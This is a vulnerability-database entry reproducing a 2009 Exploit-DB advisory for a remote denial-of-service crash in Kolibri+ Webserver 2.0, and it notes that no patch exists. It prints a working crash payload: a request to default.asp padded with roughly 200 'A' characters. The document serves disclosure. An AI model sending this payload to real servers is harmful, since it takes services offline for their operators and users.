Kolibri+ Webserver 2 , Denial Of service / Crash

vendor:

Kolibri+ Webserver 2.0

by:

Usman Saeed

7.5

CVSS

HIGH

Denial Of Service / Crash

400

CWE

Product Name: Kolibri+ Webserver 2.0

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:kolibri_webserver:kolibri_webserver_2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Kolibri+ Webserver 2 , Denial Of service / Crash

A remote denial of service vulnerability exists in Kolibri+ Webserver 2. Sending a specially crafted HTTP request with an overly long string of 'A' characters causes the application to crash.

Mitigation:

No patch is available for this vulnerability.

Source

Exploit-DB raw data:

#############################################################################################
#
#   Name    :   Kolibri+ Webserver 2 , Denial Of service / Crash
#   Author  :   Usman Saeed
#   Company :   Xc0re Security Reasearch Group
#   Date    :   06/09/09
#   Homepage :  http://www.xc0re.net
#
#############################################################################################


[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Exploitation :



[+] [Denial Of Service / CRASH]

("A" x 200; #Late crash)

Exploit:
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

# milw0rm.com [2009-09-10]